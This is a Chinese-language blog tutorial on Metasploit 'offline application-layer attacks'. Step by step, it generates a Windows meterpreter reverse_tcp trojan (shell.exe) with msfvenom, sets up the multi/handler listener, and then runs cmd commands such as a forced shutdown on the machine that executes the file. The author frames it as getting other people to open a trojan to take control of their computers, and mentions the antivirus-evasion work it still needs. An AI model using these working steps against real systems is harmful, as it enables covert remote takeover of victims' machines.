kali linux之msf离线应用层攻击

大家好，我是许心痕，今天给大家带来的是metasploit渗透测试中的：离线应用层攻击。离线攻击就是用msf生成一个木马让别人去点开木马获取别人电脑的shell，获得shell之后就获得了目标主机的控制权，最简单的就是给人家关机啦（千万不要做坏事哦）！！

好了，开始吧

0x00 准备环境

1、一台装有kali linux系统的主机（或虚拟机）、一台目标主机（这里我使用windows系统）

2、使用ifconfig命令查看本机IP，我的是192.168.64.129

0x01 开始渗透

第一步：先打开终端，输入msfconsole按回车，打开msf环境。

输入msfconsole按回车

第二步：生成木马

这里使用的命令是：msfvenom，让我们看看参数有哪些（百度搜索到的参数）

-p, –payload 指定需要使用的payload(攻击荷载)。如果需要使用自定义的payload，请使用& #039;-& #039;或者stdin指定

-l, –list [module_type] 列出指定模块的所有可用资源. 模块类型包括: payloads, encoders, nops, all

-n, –nopsled 为payload预先指定一个NOP滑动长度

-f, –format 指定输出格式 (使用 –help-formats 来获取msf支持的输出格式列表)

-e, –encoder [encoder] 指定需要使用的encoder（编码器）

-a, –arch 指定payload的目标架构

–platform 指定payload的目标平台

-s, –space 设定有效攻击荷载的最大长度

-b, –bad-chars 设定规避字符集，比如: & #039;\x00\xff& #039;

-i, –iterations 指定payload的编码次数

-c, –add-code 指定一个附加的win32 shellcode文件

-x, –template 指定一个自定义的可执行文件作为模板

-k, –keep 保护模板程序的动作，注入的payload作为一个新的进程运行

–payload-options 列举payload的标准选项

-o, –out 保存payload

-v, –var-name 指定一个自定义的变量，以确定输出格式

–shellest 最小化生成payload

-h, –help 查看帮助选项

–help-formats 查看msf支持的输出格式列表

好了，现在开始使用参数生成一个木马（以对方的系统是windows系统为例。其他系统请百度）：

输入msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.64.129 LPORT=4444 -f exe > shell.exe （lhost后面跟的是本机ip地址，lport后面跟的是监听端口，一般是4444端口，-f exe指定输出格式exe，生成以shell命名的可执行文件）按回车后就生成了一个木马，可以指定生成路径，默认的路径是home文件夹。生成木马后别急着打开，要先使用msf配置一些东西，看下一步

生成shell为名字的可执行文件exe

第三步：输入use exploit/multi/handler按回车调用模块

进入模块

第四步：输入set PAYLOAD windows/meterpreter/reverse_tcp 设置载荷

设置载荷

第五步：输入show options 查看选项

查看选项

第六步：输入set LHOST 192.168.64.129 按回车设置主机为本机ip。lhost后面跟本机的ip

设置主机

第七步：输入set LPORT 4444 按回车，设置监听端口为4444端口。

设置监听端口为4444

第八步：输入exploit进行攻击，然后就大功告成！！

expolit攻击

0x02 模拟受害者，点击木马

1、以我的物理机（windows 10 系统）为例子，我先把虚拟机生成的木马拖动到物理机上，并进行点击木马操作（注意，虚拟机的kali终端不要关闭，一直保持exploit攻击状态）。

点击木马之后就获得了对方的shell

2、上图中，点击木马之后显示这些信息，就说明我们已经拿到了shell。接下来，我们输入shell按回车。

我们已经进入到物理机的命令提示符

3、看到没有，这个图是不是有点熟悉？哈哈，我们已经进入到windows的cmd命令提示符了，学过电脑的都知道，接下来，嘿嘿，我们使用cmd命令让对方的电脑关机，输入shutdown -s -t 3600按回车，这里我设置为3600秒，因为我还要用物理机写这篇文章，你们可以设置为0秒，瞬间关机。

让对方电脑在60分钟后关机

4、好了，就写到这里了，我们先把物理机取消关机状态。输入shutdown -a

取消关机

注意事项：因为生成的木马会被360等杀毒软件检测到并拦截（测试前请关闭杀毒软件），所以还需要进行免杀操作，这里我就不演示了。这就是msf中的离线应用层攻击。想进一步了解的话大家可以去百度哦！